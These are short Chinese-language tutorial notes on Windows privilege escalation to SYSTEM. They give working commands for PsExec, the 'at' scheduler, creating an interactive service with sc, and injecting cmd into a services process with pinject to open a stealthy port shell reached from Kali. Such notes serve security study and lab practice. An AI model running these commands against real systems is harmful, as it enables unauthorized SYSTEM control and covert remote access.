1.PsExec提权
PsExec -i -s cmd //-i 交互式 -s syetem权限 打开cmd窗口
2.at 方式提权(xp,2003)
at 00:00 /interactive cmd 指定时间执行cmd,获得system权限。
操作系统中,who执行命令,命令就拥有who权限。
使用system打开任务管理器:
taskmgr
结束explorer.exe(桌面进程,权限为管理员):
桌面图标消失,任务栏消失。
再打开一个桌面进程(文件,创建新任务):
权限为系统权限(system):
3.SC提权(xp win7 win8)
sc可以用来编辑调整现有的系统服务。
以管理员身份打开cmd。
创建一个cmd服务:
sc Create syscmd binPath= “cmd /k start” type= own type= interact //等号与参数之间要有空格
启动服务:
sc start syscmd
虽然显示服务启动失败,但是弹出了信息,查看信息,获得交互式system shell:
在XP中,可以不使用管理员权限打开cmd即可执行:
4.pinjector注入进程提权(隐蔽性很高)
使用exe文件:
pinject -l // 查看进程
pinject -p [PID] cmd [端口] // PID为需要注入的进程(services)
注入到进程中:
使用kali进行监听: